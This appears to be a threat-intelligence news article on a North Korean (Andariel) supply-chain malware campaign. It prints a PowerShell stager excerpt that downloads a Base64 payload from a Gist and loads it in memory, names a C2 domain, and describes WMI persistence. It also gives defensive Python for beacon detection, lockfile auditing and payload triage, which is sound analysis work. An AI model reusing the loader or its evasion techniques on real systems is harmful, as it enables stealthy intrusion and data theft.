US Sanctions Key Threat Actors Linked With North Korea's Remote IT Worker Scheme

The U.S. Treasury’s July 8 action against Song Kum Hyok and four Russia-based entities pulled back the curtain on a sophisticated malware-enabled revenue pipeline that has quietly bankrolled Pyongyang’s weapons programs for years.

Investigators trace the campaign to Andariel, a Reconnaissance General Bureau (RGB) sub-unit already notorious for high-value cryptocurrency heists.

By placing North Korean developers inside legitimate software projects under false identities, the group gained persistent commit and code-signing access to corporate repositories and CI/CD pipelines, so malicious updates could ride trusted release channels.

Within weeks of onboarding, the rogue contractors began seeding an innocuous-looking JavaScript dependency that, once pulled into a build, side-loaded a PowerShell stager which called out to *.china-cdn[.]org, a domain posing as a content-delivery mirror.

Treasury analysts noted that the stager's beacon interval shifts randomly between 90 and 600 seconds, defeating detections that baseline on a fixed callback cadence.
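A callback that sleeps a random 90 to 600 seconds has a coefficient of variation around 0.5, so the usual "CV near zero" beaconing rule never fires. The detection below, added here as an example (it is not from the article or from Treasury), scores each client/destination pair on how many inter-arrival gaps fall inside the sleep band instead, and treats any burst well below the minimum sleep as a sign that a person, not a stager, is driving the traffic. The log format, hostnames and the gap sequences are constructed sample data.

```python
import statistics
from collections import defaultdict

# Constructed proxy log lines: "<epoch seconds> <client ip> <destination host>".
# BEACON_GAPS were chosen by hand inside the 90-600 s window the article describes;
# HUMAN_GAPS mimic bursty browsing to a single site.
BEACON_GAPS = [130, 545, 97, 410, 288, 590, 175, 350, 462, 105, 520]
HUMAN_GAPS = [1, 2, 1, 400, 3, 1, 1, 900, 2, 1, 1]


def build_series(start, gaps, src, dst):
    """Turn a start time and a list of gaps into log lines for one (src, dst) pair."""
    lines, t = [f"{start} {src} {dst}"], start
    for g in gaps:
        t += g
        lines.append(f"{t} {src} {dst}")
    return lines


SAMPLE_LOG = (build_series(1_700_000_000, BEACON_GAPS, "10.0.0.5", "mirror.example.net")
              + build_series(1_700_000_000, HUMAN_GAPS, "10.0.0.9", "news.example.com"))


def parse_lines(lines):
    """Group timestamps per (client, destination) pair."""
    series = defaultdict(list)
    for line in lines:
        ts, src, dst = line.split()
        series[(src, dst)].append(int(ts))
    return series


def gaps_of(timestamps):
    ts = sorted(timestamps)
    return [b - a for a, b in zip(ts, ts[1:])]


def coefficient_of_variation(gaps):
    """Classic fixed-interval beacon metric: near 0 for a metronome, large for jitter."""
    return statistics.pstdev(gaps) / statistics.mean(gaps)


def band_score(timestamps, lo=90, hi=600, min_events=10):
    """Fraction of inter-arrival gaps inside [lo, hi].

    A sleeping stager never calls back faster than its minimum sleep, so a gap far
    below lo (a burst) means the series is human or crawler traffic and scores 0.
    """
    if len(timestamps) < min_events:
        return 0.0
    gaps = gaps_of(timestamps)
    if min(gaps) < lo / 3:
        return 0.0
    return sum(lo <= g <= hi for g in gaps) / len(gaps)


def find_beacons(lines, threshold=0.9, **kwargs):
    """Return (client, destination, score) for series that look like jittered beacons."""
    hits = []
    for (src, dst), ts in parse_lines(lines).items():
        score = band_score(ts, **kwargs)
        if score >= threshold:
            hits.append((src, dst, round(score, 2)))
    return hits


if __name__ == "__main__":
    print("CV of the jittered beacon:", round(coefficient_of_variation(BEACON_GAPS), 2))
    print("flagged:", find_beacons(SAMPLE_LOG))
```

The band edges are the only tuning knobs; widen them slightly in production so a stager whose sleep window is 60 to 900 seconds still scores, and raise min_events when the log covers a long window.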

The same analysts found that every build job reaching GitHub Actions runners after March 2025 carried the altered dependency, evidence that supply-chain poisoning, not spear-phishing, was the preferred initial access vector.
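One check that catches this at the CI boundary, added here as an example (it is not from the article and not part of any project's tooling): diff the npm lockfile in a pull request against the last reviewed one and refuse to merge when a dependency was added, kept its version but changed its tarball hash, or resolves to a host outside the approved registry. The two lockfiles, the hostnames and the TRUSTED_REGISTRY_HOSTS set are constructed assumptions.

```python
import json
from urllib.parse import urlparse

# Assumption for this example: only the public npm registry is an approved source.
TRUSTED_REGISTRY_HOSTS = {"registry.npmjs.org"}

# Constructed sample lockfiles (package-lock v3 layout). OLD_LOCK is the last
# reviewed state; NEW_LOCK is what a contractor's pull request would produce.
OLD_LOCK = json.dumps({
    "name": "app", "lockfileVersion": 3,
    "packages": {
        "": {"name": "app"},
        "node_modules/left-pad": {
            "version": "1.3.0",
            "resolved": "https://registry.npmjs.org/left-pad/-/left-pad-1.3.0.tgz",
            "integrity": "sha512-AAAA",
        },
    },
})
NEW_LOCK = json.dumps({
    "name": "app", "lockfileVersion": 3,
    "packages": {
        "": {"name": "app"},
        "node_modules/left-pad": {
            "version": "1.3.0",
            "resolved": "https://registry.npmjs.org/left-pad/-/left-pad-1.3.0.tgz",
            "integrity": "sha512-BBBB",          # same version, different tarball hash
        },
        "node_modules/build-helper": {           # new dependency from a non-registry host
            "version": "0.1.0",
            "resolved": "https://mirror.example.net/build-helper-0.1.0.tgz",
            "integrity": "sha512-CCCC",
        },
    },
})


def load_packages(lock_text):
    """Map each node_modules path to its lock entry, skipping the root project ("")."""
    lock = json.loads(lock_text)
    return {path: meta for path, meta in lock.get("packages", {}).items() if path}


def lockfile_findings(old_text, new_text):
    """Return (kind, path, resolved) tuples for every change a reviewer should look at."""
    old, new = load_packages(old_text), load_packages(new_text)
    findings = []
    for path, meta in new.items():
        resolved = meta.get("resolved", "")
        if path not in old:
            findings.append(("added", path, resolved))
        elif meta.get("integrity") != old[path].get("integrity"):
            # Same version, new hash: a different tarball is being installed, which is
            # exactly what a poisoned dependency looks like in the lockfile.
            findings.append(("integrity-changed", path, resolved))
        elif resolved != old[path].get("resolved"):
            findings.append(("resolved-changed", path, resolved))
        host = urlparse(resolved).hostname or ""
        if host and host not in TRUSTED_REGISTRY_HOSTS:
            findings.append(("untrusted-source", path, resolved))
        if not meta.get("link") and not meta.get("integrity"):
            findings.append(("no-integrity", path, resolved))
    for path in old:
        if path not in new:
            findings.append(("removed", path, ""))
    return findings


def ci_gate(old_text, new_text, allow_kinds=("removed",)):
    """True when the lockfile change is safe to merge without a human looking at it."""
    return all(kind in allow_kinds for kind, _, _ in lockfile_findings(old_text, new_text))


if __name__ == "__main__":
    for finding in lockfile_findings(OLD_LOCK, NEW_LOCK):
        print(*finding)
    print("merge allowed:", ci_gate(OLD_LOCK, NEW_LOCK))
```

Run it as a required status check with the base branch's lockfile as the old side; a registry mirror or private scope is added by extending TRUSTED_REGISTRY_HOSTS, never by loosening the integrity comparison.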

Victims span fintech, healthcare, and industrial IoT vendors on three continents; in several cases, corrupted binaries were pushed to over-the-air update servers, effectively weaponizing routine patch cycles.

Infected devices later funneled telemetry, clipboard contents, and cryptocurrency wallet files to Andariel's command tier, compressing the exfiltrated content with LZNT1 before encrypting it with AES-256. Treasury researchers noted that the group cashed out stolen wallets directly, while other data was sold on Russian-language underground markets.

Memory-Resident Loader

The initial JavaScript implant merely fetches a Base64-encoded blob stored in a GitHub Gist referenced as “worker-resume.txt”.

The blob expands into a four-stage PowerShell script that never touches disk, using Add-Type to compile C# inline and abusing Windows Management Instrumentation (WMI) for persistence.

A condensed excerpt illustrates the crucial hand-off:

# $gurl: raw URL of the Gist holding "worker-resume.txt" (not shown in the excerpt)
$raw   = Invoke-RestMethod $gurl
$bytes = [System.Convert]::FromBase64String($raw)
# DeflateStream expects raw DEFLATE data (no zlib or gzip header)
$decomp = [System.IO.Compression.DeflateStream]::new(
  [System.IO.MemoryStream]::new($bytes),
  [System.IO.Compression.CompressionMode]::Decompress)
# Inflate the whole assembly into memory; nothing is written to disk
$asm = [System.IO.MemoryStream]::new()
$buf = New-Object byte[] 0x2000
while (($len = $decomp.Read($buf, 0, $buf.Length)) -gt 0) {
  $asm.Write($buf, 0, $len)
}
# Reflective load of the complete .NET payload
[System.Reflection.Assembly]::Load($asm.ToArray()) | Out-Null
# Jittered sleep before the next callback (Get-Random's upper bound is exclusive)
Start-Sleep -Seconds (Get-Random -Minimum 90 -Maximum 600)

Each execution loads the unpacked .NET payload directly into memory, sidestepping file-based antivirus scans and leaving only volatile artifacts: the reflectively loaded assembly and the hooks it places in amsi.dll.
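An analyst who has the Gist text can run the same decode step the stager runs, but write the result to disk for a disassembler instead of loading it. The script below is an added example, not code from the article or the malware; the Base64 blob it decodes is a constructed stand-in (a fake PE header with no executable code), and the one detail worth remembering is that System.IO.Compression.DeflateStream produces raw RFC 1951 DEFLATE, so zlib must be told there is no header (wbits=-15) or it raises zlib.error.

```python
import base64
import struct
import zlib


def build_sample_blob():
    """Constructed stand-in for the Gist blob: a fake PE image (MZ header, e_lfanew
    pointing at a PE signature) compressed with raw DEFLATE and Base64-encoded.
    It is not a real payload and contains no executable code."""
    image = bytearray(b"MZ" + b"\0" * 58)            # 60 bytes: DOS header up to e_lfanew
    image += struct.pack("<I", 0x80)                  # e_lfanew at offset 0x3C -> 0x80
    image += b"\0" * (0x80 - len(image))
    image += b"PE\0\0" + b"\0" * 20                   # NT signature + COFF header placeholder
    image += b"<.NET metadata would follow here>"
    compressor = zlib.compressobj(wbits=-15)          # -15: raw DEFLATE, no zlib header
    data = compressor.compress(bytes(image)) + compressor.flush()
    return base64.b64encode(data).decode("ascii")


def unpack_blob(b64_text):
    """Mirror the stager: Base64-decode, then inflate as raw DEFLATE (wbits=-15)."""
    return zlib.decompress(base64.b64decode(b64_text), wbits=-15)


def looks_like_pe(blob):
    """Cheap triage check that what came out is a PE image (and so a candidate .NET assembly)."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    return blob[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def recover_payload(b64_text, out_path=None):
    """Unpack the blob, verify it is a PE, and optionally write it out for analysis."""
    image = unpack_blob(b64_text)
    if not looks_like_pe(image):
        raise ValueError("decoded blob is not a PE image")
    if out_path:
        with open(out_path, "wb") as fh:
            fh.write(image)
    return image


if __name__ == "__main__":
    pe = recover_payload(build_sample_blob())
    sig_offset = struct.unpack_from("<I", pe, 0x3C)[0]
    print(f"recovered {len(pe)} bytes, PE signature at 0x{sig_offset:x}")
```

Feed the real Gist text to recover_payload with an out_path on an isolated analysis host; if the decode fails with zlib.error, the stager has changed its framing and the first thing to check is whether a zlib or gzip header (wbits=15 or 31) has been added.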

The malicious DLL then registers a WMI permanent event subscription (an __EventFilter, an __EventConsumer, and the __FilterToConsumerBinding that ties them together) under root\subscription, so it revives after reboots without creating a new service or registry Run key, an evasion tactic that kept detection rates below 5 percent across VirusTotal submissions through June 2025.

Continued sanctions pressure will complicate cash-out avenues, yet the campaign’s low footprint underscores why remote contractor workflows remain an attractive, hard-to-audit conduit for state-sponsored malware operators.
